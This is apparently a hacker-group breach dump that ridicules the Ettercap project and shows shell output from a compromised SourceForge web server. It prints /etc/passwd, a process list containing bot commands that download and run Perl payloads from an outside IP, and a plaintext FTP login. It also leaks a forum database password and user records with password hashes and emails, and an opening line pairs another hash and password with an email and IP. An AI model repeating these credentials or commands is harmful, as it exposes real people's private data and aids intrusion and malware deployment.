anT!-Tr0J4n:b6f1b2d02236cb9bc983482c5789999c:`dFJd>n&KjhTtynf#L05jSQ%h'=jsl:rnoom_h@yahoo.com:41.191.28.15:

,_._._._._._._._|____________________________________________________
|_|_|_|_|_|_|_|_|___________________________________________________/
~ ettercap ~ !

You would think that the authors of Ettercap, one of the most popular
whitehat pentesting tools, would know the basics of security.
Apparently they don't, or they just don't give a shit about what
happens to their users.

So, why is their website so insecure? Ettercap's message board is
hosted at Sourceforge, so they share a server with thousands of other
customers. Every single customer is able to execute commands and
access the other project directories. Pretty stupid, eh? You only need
to find one hole in one hosted site and you can access ALL the project
databases. Of course that isn't ALoR's fault, it's Sourceforge's
fault. Regardless, people who care about security and data integrity
wouldn't use such a shitty provider, would they? To be fair, the
Ettercap project is dead. Most of the admins have been inactive for a
few years now, but that is no excuse for such a security mess.
Especially since the server was compromised some five years ago.

Just look at the process list, horrible. Even the worst perl bots
(scax) get access. If such a poorly written bot can own this box,
everyone can.

Some good advice to all other people/projects who are using
Sourceforge: Move. There are enough good alternatives. Yes, I am
talking to you Vim, get the fuck out of there. And to all Ettercap
users: arp poisoning is *not* hacking. If you want to achieve
something real, learn the fundamentals and not how to use a GUI. Don't
sniff the passwords of your friends and call yourself a pentester
(looking at you firesheep).

_ _
| | | |
___| |_| |_ ___ _ __ ___ _ __ __ _ __
/ _ \ __| __/ _ \ '__/ __| '__|/ \ | '_ \
| __/ |_| || __/ | | (__| | / /\ \ | |_) |
\___|\__|\__\___|_| \___|_| /_/ \_\| .__/
| |
|_|
Baa.
I flood SID's
I'm a Hacker!! Baa.
Baa. Baa. I sit at starbucks
I sniff packets | I'm a Hacker!!
I'm a Hacker!! | Baa.
Baa.. | /
\ __ _ | / YOUR ALL FUCKING
\ .-.' `; `-._ __ _ __ _ SHEEP.
\ (_, .-:' `; `-._.-.:' `; `-._
,'o"( "HACKE(_, (_, )
(__,-' ,'o"( "HACKE,'o"( "HACKER" )> STOP BEING SHEEP!
( (__,-' (__,-' )
`-'._.--._( ( ) FUCKING INNOVATE!
||| |||`-'._.--._.-' `-'._.--._.-'
||| ||| ||| |||

$ uname -a
Linux sfp-web-9.v30.ch3.sourceforge.com 2.6.18-194.11.4.el5 #1 SMP Tue Sep 21 05:04:09 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux

$ id
uid=48(apache) gid=48(apache) groups=48(apache),302(amqp)

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
exim:x:93:93::/var/spool/exim:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
sashroot:x:0:500:sashroot:/sashroot:/bin/bash
osiris:x:300:300:Osiris Daemon:/var/lib/osiris:/sbin/nologin
puppet:x:301:301:Puppet:/var/lib/puppet:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
vhost:*:310:310:Vhost User:/home/vhost:/bin/bash
rtstats:*:442:442:RTstats user:/var/local/stats:/bin/bash
nginx:x:443:443:Nginx user:/var/lib/nginx:/bin/false
nrpe:x:444:446:NRPE user for the NRPE service:/:/sbin/nologin
dummy:*:103:103:projectweb dummy user:/home/dummy:/bin/false
www:*:448:448:WWW User:/var/www:/bin/bash
sfeng:*:333:333:SF Engineer:/home/sfeng:/bin/rbash
sfeng2:*:332:332:SF Engineer 2:/home/sfeng2:/bin/bash
avahi-autoipd:x:449:449:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
munin:x:450:450:Munin user:/var/lib/munin:/sbin/nologin
rrdcached:x:451:451:rrdcached:/var/rrdtool/rrdcached:/sbin/nologin

$ ps auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 10352 80 ? Ss Sep28 0:46 init [3]
root 2 0.0 0.0 0 0 ? S< Sep28 1:58 [migration/0]
root 3 0.0 0.0 0 0 ? SN Sep28 0:01 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/0]
root 5 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/1]
root 6 0.0 0.0 0 0 ? SN Sep28 0:48 [ksoftirqd/1]
root 7 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/1]
root 8 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/2]
root 9 0.0 0.0 0 0 ? SN Sep28 0:09 [ksoftirqd/2]
root 10 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/2]
root 11 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/3]
root 12 0.0 0.0 0 0 ? SN Sep28 1:42 [ksoftirqd/3]
root 13 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/3]
root 14 0.0 0.0 0 0 ? S< Sep28 0:14 [migration/4]
root 15 0.0 0.0 0 0 ? SN Sep28 0:02 [ksoftirqd/4]
root 16 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/4]
root 17 0.0 0.0 0 0 ? S< Sep28 0:20 [migration/5]
root 18 0.0 0.0 0 0 ? SN Sep28 0:04 [ksoftirqd/5]
root 19 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/5]
root 20 0.0 0.0 0 0 ? S< Sep28 0:09 [migration/6]
root 21 0.0 0.0 0 0 ? SN Sep28 0:03 [ksoftirqd/6]
root 22 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/6]
root 23 0.0 0.0 0 0 ? S< Sep28 0:08 [migration/7]
root 24 0.0 0.0 0 0 ? SN Sep28 0:03 [ksoftirqd/7]
root 25 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/7]
root 26 0.0 0.0 0 0 ? S< Sep28 0:00 [events/0]
root 27 0.0 0.0 0 0 ? S< Sep28 0:00 [events/1]
root 28 0.0 0.0 0 0 ? S< Sep28 0:00 [events/2]
root 29 0.0 0.0 0 0 ? S< Sep28 0:00 [events/3]
root 30 0.0 0.0 0 0 ? S< Sep28 0:00 [events/4]
root 31 0.0 0.0 0 0 ? S< Sep28 0:00 [events/5]
root 32 0.0 0.0 0 0 ? S< Sep28 0:00 [events/6]
root 33 0.0 0.0 0 0 ? S< Sep28 0:00 [events/7]
root 34 0.0 0.0 0 0 ? S< Sep28 0:00 [khelper]
root 105 0.0 0.0 0 0 ? S< Sep28 0:00 [kthread]
root 116 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/0]
root 117 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/1]
root 118 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/2]
root 119 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/3]
root 120 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/4]
root 121 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/5]
root 122 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/6]
root 123 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/7]
root 124 0.0 0.0 0 0 ? S< Sep28 0:00 [kacpid]
root 237 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/0]
root 238 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/1]
root 239 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/2]
root 240 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/3]
root 241 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/4]
root 242 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/5]
root 243 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/6]
root 244 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/7]
root 247 0.0 0.0 0 0 ? S< Sep28 0:00 [khubd]
root 249 0.0 0.0 0 0 ? S< Sep28 0:00 [kseriod]
root 364 0.0 0.0 0 0 ? S Sep28 0:00 [khungtaskd]
root 367 0.0 0.0 0 0 ? S< Sep28 29:37 [kswapd0]
root 368 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/0]
root 369 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/1]
root 370 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/2]
root 371 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/3]
root 372 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/4]
root 373 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/5]
root 374 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/6]
root 375 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/7]
root 539 0.0 0.0 0 0 ? S< Sep28 0:00 [kpsmoused]
root 618 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_0]
root 637 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/0]
root 638 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/1]
root 639 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/2]
root 640 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/3]
root 641 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/4]
root 642 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/5]
root 643 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/6]
root 644 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/7]
root 645 0.0 0.0 0 0 ? S< Sep28 0:00 [ata_aux]
root 664 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_1]
root 665 0.0 0.0 0 0 ? S< Sep28 5:14 [usb-storage]
root 667 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_2]
root 668 0.0 0.0 0 0 ? S< Sep28 1:45 [usb-storage]
root 679 0.0 0.0 0 0 ? S< Sep28 0:00 [kstriped]
root 716 0.0 0.0 0 0 ? S< Sep28 0:00 [ksnapd]
root 755 0.0 0.0 0 0 ? S< Sep28 30:00 [kjournald]
root 780 0.0 0.0 0 0 ? S< Sep28 0:02 [kauditd]
root 813 0.0 0.0 12764 168 ? S<s Sep28 0:00 /sbin/udevd -d
root 1571 0.0 0.0 0 0 ? S< Sep28 0:00 [kedac]
root 2416 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/0]
root 2417 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/1]
root 2418 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/2]
root 2419 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/3]
root 2420 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/4]
root 2421 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/5]
root 2422 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/6]
root 2423 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/7]
root 2424 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpath_handlerd]
root 2448 0.0 0.0 0 0 ? S< Sep28 0:00 [kjournald]
root 2931 0.0 0.0 0 0 ? S< Sep28 0:00 [bond0]
root 3221 0.0 0.0 92864 476 ? S<sl Sep28 2:13 auditd
root 3223 0.0 0.0 81804 292 ? S<sl Sep28 2:33 /sbin/audispd
root 3253 0.0 0.0 5912 308 ? Ss Sep28 1:09 syslogd -m 0
root 3256 0.0 0.0 3808 196 ? Ss Sep28 0:15 klogd -x
root 3270 0.0 0.0 10764 280 ? Ss Sep28 1:06 irqbalance
named 3307 0.0 0.0 291644 3428 ? Ssl Sep28 79:54 /usr/sbin/named -u named
rpc 3341 0.0 0.0 8056 32 ? Ss Sep28 0:00 portmap
root 3378 0.0 0.0 0 0 ? S< Sep28 44:14 [rpciod/0]
root 3379 0.0 0.0 0 0 ? S< Sep28 0:19 [rpciod/1]
root 3380 0.0 0.0 0 0 ? S< Sep28 0:16 [rpciod/2]
root 3381 0.0 0.0 0 0 ? S< Sep28 0:19 [rpciod/3]
root 3382 0.0 0.0 0 0 ? S< Sep28 1:01 [rpciod/4]
root 3383 0.0 0.0 0 0 ? S< Sep28 0:17 [rpciod/5]
root 3384 0.0 0.0 0 0 ? S< Sep28 0:16 [rpciod/6]
root 3385 0.0 0.0 0 0 ? S< Sep28 0:18 [rpciod/7]
rpcuser 3398 0.0 0.0 10164 212 ? Ss Sep28 0:00 rpc.statd
root 3421 0.0 0.0 55448 4 ? Ss Sep28 0:00 rpc.idmapd
dbus 3444 0.0 0.0 21260 4 ? Ss Sep28 0:00 dbus-daemon --system
root 3498 0.0 0.0 0 0 ? S< Sep28 9:35 [nfsiod]
root 3499 0.0 0.0 0 0 ? S Sep28 0:00 [lockd]
root 3568 0.0 0.0 3804 4 ? Ss Sep28 0:00 /usr/sbin/acpid
nscd 3589 0.0 0.0 252376 828 ? Ssl Sep28 24:19 /usr/sbin/nscd
root 3630 0.0 0.0 67656 332 ? Ss Sep28 0:48 /usr/sbin/sshd
root 3647 0.0 0.0 22072 412 ? Ss Sep28 1:15 xinetd -stayalive -pidfile /var/run/xinetd.pid
ntp 3667 0.0 0.0 23820 5452 ? SLs Sep28 0:31 ntpd -u ntp:ntp -p /var/run/ntpd.pid
exim 3686 0.0 0.0 80572 580 ? Ss Sep28 0:35 /usr/sbin/exim -bd -q1h
root 3824 0.0 0.0 72920 488 ? Ss Sep28 0:36 crond
root 3839 0.0 0.0 95052 3052 ? Ss Sep28 0:36 /usr/sbin/munin-node
root 4211 0.0 0.0 69544 4 ? Ssl Oct13 0:00 sfcbd -d
root 4213 0.0 0.0 59300 4 ? S Oct13 0:00 sfcbd -d
root 4214 0.0 0.0 71740 4 ? S Oct13 0:00 sfcbd -d
root 4274 0.0 0.0 159036 3408 ? Sl Oct13 5:06 /usr/sbin/snmpd -LSnd -Lf /dev/null -p /var/run/snmpd.pid -a -c /etc/snmp/snmpd.sfinc-utils.conf
root 4303 0.0 0.0 61380 4 ? S Oct13 0:00 sfcbd -d
root 4417 0.0 0.0 0 0 ? S Nov24 0:12 [pdflush]
root 4565 0.0 0.0 279692 2792 ? Ssl Oct13 8:44 /opt/dell/srvadmin/sbin/dsm_sa_datamgrd
root 4568 0.0 0.0 61360 4 ? S Oct13 0:00 sfcbd -d
root 4571 0.0 0.0 73688 4 ? S Oct13 0:00 sfcbd -d
root 4864 0.0 0.0 174704 528 ? Ssl Oct13 0:36 /opt/dell/srvadmin/sbin/dsm_sa_eventmgrd
root 4925 0.0 0.0 254748 2084 ? Ssl Oct13 15:43 /opt/dell/srvadmin/sbin/dsm_sa_snmpd
avahi 5106 0.0 0.0 21612 532 ? Ss Sep28 0:00 avahi-daemon: running [sfp-web-9.local]
avahi 5107 0.0 0.0 21480 200 ? Ss Sep28 0:00 avahi-daemon: chroot helper
68 5156 0.0 0.0 29540 1216 ? Ss Sep28 0:52 hald
root 5157 0.0 0.0 21700 448 ? S Sep28 0:00 hald-runner
68 5188 0.0 0.0 10656 484 ? S Sep28 0:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket
68 5200 0.0 0.0 10660 480 ? S Sep28 0:00 hald-addon-keyboard: listening on /dev/input/event0
root 5208 0.0 0.0 10232 432 ? S Sep28 4:39 hald-addon-storage: polling /dev/scd0
root 5213 0.0 0.0 10232 432 ? S Sep28 1:13 hald-addon-storage: polling /dev/hda
root 5215 0.0 0.0 10232 440 ? S Sep28 1:07 hald-addon-storage: polling /dev/sdb
root 5245 0.0 0.0 35904 240 ? S Sep28 0:00 /usr/sbin/osirisd -r /var/lib/osiris
osiris 5246 0.0 0.0 36116 748 ? S Sep28 0:00 /usr/sbin/osirisd -r /var/lib/osiris
root 5249 0.0 0.0 3796 436 tty1 Ss+ Sep28 0:00 /sbin/mingetty tty1
root 5250 0.0 0.0 3796 436 tty2 Ss+ Sep28 0:00 /sbin/mingetty tty2
root 5251 0.0 0.0 3796 436 tty3 Ss+ Sep28 0:00 /sbin/mingetty tty3
root 5252 0.0 0.0 3796 436 tty4 Ss+ Sep28 0:00 /sbin/mingetty tty4
root 5254 0.0 0.0 3796 436 tty5 Ss+ Sep28 0:00 /sbin/mingetty tty5
root 5256 0.0 0.0 3796 436 tty6 Ss+ Sep28 0:00 /sbin/mingetty tty6
apache 5767 0.0 0.0 8704 828 ? S Nov18 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache 5769 0.0 0.0 58608 1508 ? S Nov18 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
apache 8772 0.0 0.4 395468 38516 ? S Nov23 0:02 /usr/sbin/httpd
apache 9928 0.0 0.4 393956 39732 ? S Nov24 0:05 /usr/sbin/httpd
root 10444 0.0 0.0 316928 6416 ? Ss Nov16 0:27 /usr/sbin/httpd
root 10445 0.0 0.0 3852 504 ? S Nov16 1:57 /usr/sbin/cronolog --symlink=/var/local/log/error_log /var/local/log/%Y/%m/%d/error.log
root 10447 0.0 0.0 3848 440 ? S Nov16 1:23 /usr/sbin/cronolog --symlink=/var/local/log/vhost_log /var/local/log/%Y/%m/%d/vhost_log
root 10448 0.0 0.0 3848 460 ? S Nov16 5:50 /usr/sbin/cronolog --symlink=/var/local/log/access_log /var/local/log/%Y/%m/%d/access_log
root 10449 0.0 0.0 3856 440 ? S Nov16 0:03 /usr/sbin/cronolog --symlink=/var/local/log/developerweb_log /var/local/log/%Y/%m/%d/developerweb_log
root 10450 0.0 0.2 125312 18580 ? Sl Nov16 10:28 /usr/bin/perl -w /var/local/mastertree/host/sfp-web/scripts/vhost_rewriter
apache 10865 0.0 0.3 390016 25028 ? S Nov24 0:01 /usr/sbin/httpd
apache 11814 0.0 0.0 8704 1016 ? S Nov24 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache 11816 0.0 0.0 58608 2620 ? S Nov24 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
apache 12188 0.0 0.0 8704 980 ? S Nov24 0:00 sh -c cd /tmp;lftpget http://95.178.16.118/b;chmod x b;perl b;cd /tmp;rm -rf *;
apache 12189 0.0 0.0 58616 2624 ? S Nov24 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/b";
root 12523 0.0 0.0 56648 392 ? Ss Nov04 0:00 nginx: master process /usr/sbin/nginx -c /etc/nginx/nginx.conf
nginx 12524 0.2 0.0 57388 1500 ? S Nov04 68:37 nginx: worker process
nginx 12525 0.1 0.0 57764 1840 ? S Nov04 59:01 nginx: worker process
nginx 12526 0.2 0.0 57456 1520 ? S Nov04 64:31 nginx: worker process
nginx 12527 0.2 0.0 58160 2404 ? S Nov04 63:14 nginx: worker process
nginx 12528 0.1 0.0 57788 1780 ? S Nov04 47:43 nginx: worker process
nginx 12529 0.1 0.0 57720 1792 ? S Nov04 48:26 nginx: worker process
nginx 12530 0.2 0.0 57584 1620 ? S Nov04 61:50 nginx: worker process
nginx 12531 0.2 0.0 57856 1884 ? S Nov04 64:09 nginx: worker process
apache 13296 0.7 0.5 411004 46200 ? S 12:18 0:04 /usr/sbin/httpd
apache 13709 0.0 0.5 403000 42372 ? S Nov24 0:06 /usr/sbin/httpd
rtstats 15645 1.6 0.1 179260 10884 ? S Nov16 221:11 /usr/bin/python /var/local/stats/rtstats/datasources/prweb.py --daemonize --tail --pidfile /var/run/rtstats/prweb.pid --infolog /var/log/rtstats/datasource-prweb.log --configfile /var/local/config/rtstats/datasources/prweb.cfg --configfile /var/local/stats/rtstats.cfg
apache 16268 0.0 0.0 60804 1508 ? S Nov19 0:00 lftp -u GFS,87dbcvwx15s4f56ds54f perfo-lehavre.no-ip.org -p 146 -e lcd "/home/groups/f/fl/florianrobinet/htdocs/GFS/Archives"; mirror -s -R --Remove-source-files; exit
apache 17814 0.0 0.0 8704 1040 ? S Nov24 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache 17818 0.0 0.0 58608 2620 ? S Nov24 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
apache 18478 0.0 0.3 391904 28156 ? S 03:26 0:13 /usr/sbin/httpd
apache 18960 2.8 0.5 398652 45604 ? S 12:25 0:05 /usr/sbin/httpd
apache 19043 2.5 0.4 398116 33464 ? S 12:25 0:05 /usr/sbin/httpd
apache 19055 4.9 0.5 405644 41216 ? S 12:25 0:09 /usr/sbin/httpd
apache 19056 2.9 0.4 402072 37836 ? S 12:25 0:05 /usr/sbin/httpd
apache 19077 2.5 0.4 399132 35544 ? S 12:25 0:04 /usr/sbin/httpd
apache 19093 3.0 0.4 397244 34216 ? S 12:25 0:05 /usr/sbin/httpd
apache 19094 3.1 0.5 398832 43744 ? S 12:25 0:05 /usr/sbin/httpd
apache 19741 0.0 0.0 8704 1028 ? S 03:29 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache 19745 0.0 0.0 58608 2616 ? S 03:29 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
apache 19789 2.0 0.4 394212 36988 ? S 12:27 0:02 /usr/sbin/httpd
apache 19903 2.4 0.4 396360 37188 ? S 12:27 0:02 /usr/sbin/httpd
apache 19945 2.7 0.3 395120 30760 ? S 12:27 0:02 /usr/sbin/httpd
apache 20138 3.1 0.3 395072 30492 ? S 12:27 0:02 /usr/sbin/httpd
apache 20203 2.0 0.4 394404 35928 ? S 12:27 0:01 /usr/sbin/httpd
apache 20274 3.0 0.3 397052 30000 ? S 12:27 0:02 /usr/sbin/httpd
apache 20434 0.0 0.3 401880 29916 ? S Nov24 0:28 /usr/sbin/httpd
apache 20439 2.5 0.3 393252 30576 ? S 12:28 0:01 /usr/sbin/httpd
apache 22124 0.0 0.4 401232 34788 ? S Nov24 0:05 /usr/sbin/httpd
apache 23720 0.0 0.0 8704 1008 ? S Nov24 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache 23722 0.0 0.0 58608 2620 ? S Nov24 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
apache 24614 0.0 0.0 8704 1020 ? S Nov24 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache 24616 0.0 0.0 58608 2624 ? S Nov24 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
apache 24714 0.0 0.1 377988 12680 ? S Nov24 0:00 /usr/sbin/httpd
apache 24719 0.0 0.0 8704 980 ? S Nov24 0:00 sh -c cd /tmp;lftpget http://95.178.16.118/b;chmod x b;perl b;cd /tmp;rm -rf *;
apache 24720 0.0 0.0 58616 2624 ? S Nov24 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/b";
apache 25971 0.0 0.0 8704 828 ? S Nov21 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache 25974 0.0 0.0 58608 1512 ? S Nov21 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
root 27631 0.0 0.0 0 0 ? S Nov23 0:00 [pdflush]
apache 31023 0.0 0.1 399148 8908 ? S Nov23 0:04 /usr/sbin/httpd
apache 31873 0.0 0.3 388288 25512 ? S 01:48 0:01 /usr/sbin/httpd
apache 32062 0.0 0.0 8704 1064 ? S 01:48 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache 32067 0.0 0.0 58608 2620 ? S 01:48 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
apache 32288 0.0 0.0 8704 820 ? S Nov23 0:00 sh -c cd /tmp;lftpget http://95.178.16.118/b;chmod x b;perl b;cd /tmp;rm -rf *;
apache 32289 0.0 0.0 58608 1508 ? S Nov23 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/b";

$ w
12:28:48 up 30 days, 40 min, 1 user, load average: 0.65, 0.64, 0.66
USER TTY FROM LOGIN@ IDLE JCPU

  
PCPU WHAT
root pts/0 sec-sog-2.v99.ch 04:17 8:03m 0.11s 0.11s -bash

$ ls -lah /home/groups/e/et/ettercap/htdocs/
total 2.7M
drwxrwsr-x 8 dummy 18435 2.0K Oct 18 2009 .
drwxrws--x 5 dummy 18435 1.0K Sep 17 2008 ..
-rw-r--r-- 1 42100 18435 2.2K Dec 21 2004 authors.php
drwxr-xr-x 2 42100 18435 2.0K Aug 9 2008 devel
-rw-r--r-- 1 42100 18435 1.6K Apr 15 2004 download.php
-rw-r--r-- 1 42100 18435 2.7K Apr 24 2004 fingerprint.php
drwx--x--x 10 42100 18435 2.0K Oct 18 2009 forum
-rw-r--r-- 1 42100 18435 2.2K Apr 15 2004 history.php
drwxr-xr-x 3 42100 18435 1.0K Aug 9 2008 images
drwxr-xr-x 2 42100 18435 1.0K Aug 9 2008 includes
-rw-r--r-- 1 42100 18435 4.6K Sep 23 2004 index.php
-rw-r--r-- 1 42100 18435 768 Apr 15 2004 latest.php
-rw-r--rw- 1 42100 18435 5 Aug 15 2005 latest.stat
-rw-r--r-- 1 42100 18435 886 Apr 15 2004 news.php
-rw-r--r-- 1 42100 18435 5.3K Nov 13 2003 news.txt
-rw-r--r-- 1 42100 18435 2.3M Oct 18 2009 phpBB-3.0.5.zip
drwxr-xr-x 13 42100 18435 2.0K Oct 18 2009 phpBB3
-rw-r--r-- 1 42100 18435 743 Apr 15 2004 plugins.php
-rw-r--r-- 1 42100 18435 914 May 6 2003 plugins.txt
drwxr-xr-x 2 42100 18435 2.0K Aug 9 2008 release
-rw-r--r-- 1 42100 18435 3.7K Apr 15 2004 screenshots.php
-rw-r--r-- 1 42100 18435 1019 Apr 15 2004 search.php
-rw-r--r-- 1 42100 18435 1.8K Apr 15 2004 stuff.php
-rw-r--r-- 1 42100 18435 1.5K Jan 25 2001 style.css
-rw-r--rw- 1 42100 18435 3.0K Aug 15 2005 submitted.fingers.txt
-rw-r--r-- 1 42100 18435 12K Jun 24 2005 updateNG.data
-rw-rw-rw- 1 42100 18435 230K Aug 15 2005 updateNG.log
-rw-r--r-- 1 42100 18435 2.0K Nov 9 2005 updateNG.php
-rwxr-xr-x 1 42100 18435 201 Jul 13 2003 updateNG.sh

$ cat /home/groups/e/et/ettercap/htdocs/updateNG.sh
#!/bin/sh

wget http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/ettercap/ettercap_ng/share/ -O updateNG.data
chmod 644 updateNG.data
scp updateNG.data alor@ettercap.sf.net:ettercap
rm -f updateNG.data

$ cat /home/groups/e/et/ettercap/htdocs/forum/config.php
<?php

//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//

$dbms = "mysql";

$dbhost = "mysql4-e";
$dbname = "e17435_etterforum";
$dbuser = "e17435admin";
$dbpasswd = "ettersql_a";

$table_prefix = "phpbb_";

define('PHPBB_INSTALLED', true);

define('DEBUG', true);

?>

$ SELECT phpbb_users.username, phpbb_users.user_password, phpbb_users.user_email,
phpbb_ranks.rank_title FROM phpbb_users LEFT JOIN phpbb_ranks ON user_rank = rank
id WHERE user_rank > 0 ORDER BY user_rank
NaGA:256ce2d528caee146c82f20a3378673f:naga@antifork.org:Ettercap Developer
ares:9c05a83765c4aad064d737496dae2dee:ares@inwind.it:Supporter
metaldemon:3ef4f11188954e64884037cae7c3e963:metaldemon@tiscalinet.it:Supporter
ttyp1:3c5e778f14dee668c0a9560fb8a6ced2:yokel4@anonymous.to:Betatester
drygol:c8214d5d4d4eb4b45d2bca063c07dd6a:pandrychowski@lpp.com.pl:Betatester
Gumble:ce7bcda695c30aa2f9e5f390c820d985:dukegumble@redseven.de:Betatester
Acelent:817b61c60959294d4250912f816f9451:acelent@gmail.com:Betatester
